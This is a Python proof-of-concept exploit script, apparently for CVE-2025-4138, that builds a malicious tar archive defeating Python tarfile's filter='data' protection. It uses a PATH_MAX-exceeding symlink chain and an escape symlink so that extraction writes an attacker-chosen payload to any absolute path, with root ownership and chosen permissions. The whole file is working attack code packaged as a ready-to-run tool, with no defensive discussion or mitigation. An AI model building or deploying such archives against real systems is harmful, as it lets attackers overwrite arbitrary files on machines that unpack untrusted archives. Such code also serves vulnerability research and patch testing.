#!/usr/bin/env python3
"""
CVE-2025-4138 — Python tarfile filter="data" bypass via PATH_MAX symlink chain.
Builds a malicious tar that writes an arbitrary file outside the extraction directory.
"""

import argparse
import io
import os
import tarfile

# 16 levels * 247 chars = 3968 bytes (Linux's PATH_MAX = 4096)
DIR_LEN = 247

# 16 chars to use to form symlinks
CHARS = "abcdefghijklmnop"

def build_tar(tar_path, target_file, payload, mode):
    target_dir = os.path.dirname(target_file)
    target_name = os.path.basename(target_file)
    long_dir = "d" * DIR_LEN # 247 d's

    # Symlink chain loop
    with tarfile.open(tar_path, "w") as tar:
        prefix = ""
        for char in CHARS:
            d = tarfile.TarInfo(os.path.join(prefix, long_dir))
            d.type = tarfile.DIRTYPE
            tar.addfile(d)

            s = tarfile.TarInfo(os.path.join(prefix, char))
            s.type = tarfile.SYMTYPE
            s.linkname = long_dir
            tar.addfile(s)

            prefix = os.path.join(prefix, long_dir)

        short_chain = "/".join(CHARS) # "a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p"
        pivot_name = os.path.join(short_chain, "l" * 254) # "a/b/../llllllll...lll"
        pivot = tarfile.TarInfo(pivot_name)
        pivot.type = tarfile.SYMTYPE
        pivot.linkname = "../" * len(CHARS)
        tar.addfile(pivot)

        escape = tarfile.TarInfo("escape")
        escape.type = tarfile.SYMTYPE
        escape.linkname = pivot_name + "/" + ("../" * 8) + target_dir.lstrip("/")
        tar.addfile(escape)

        f = tarfile.TarInfo(f"escape/{target_name}")
        f.type = tarfile.REGTYPE
        f.size = len(payload)
        f.mode = mode
        f.uid = 0
        f.gid = 0
        tar.addfile(f, io.BytesIO(payload))

def main():
    p = argparse.ArgumentParser(description="CVE-2025-4138 tarfile filter bypass")
    p.add_argument("-o", "--output", required=True, help="output tar path")
    p.add_argument("-t", "--target", required=True, help="absolute path to write to on target")
    p.add_argument("-p", "--payload", required=True, help="File to use a payload")
    p.add_argument("-m", "--mode", required=False, default="0644", help="Set file permissions (default: 0644)")

    args = p.parse_args()
    payload_path = os.path.expanduser(args.payload)
    with open(payload_path, "rb") as fh:
        payload = fh.read()

    if not payload.endswith(b"\n"):
        payload += b"\n"
    
    build_tar(args.output, args.target, payload, int(args.mode, 8))

if __name__ == "__main__":
    main()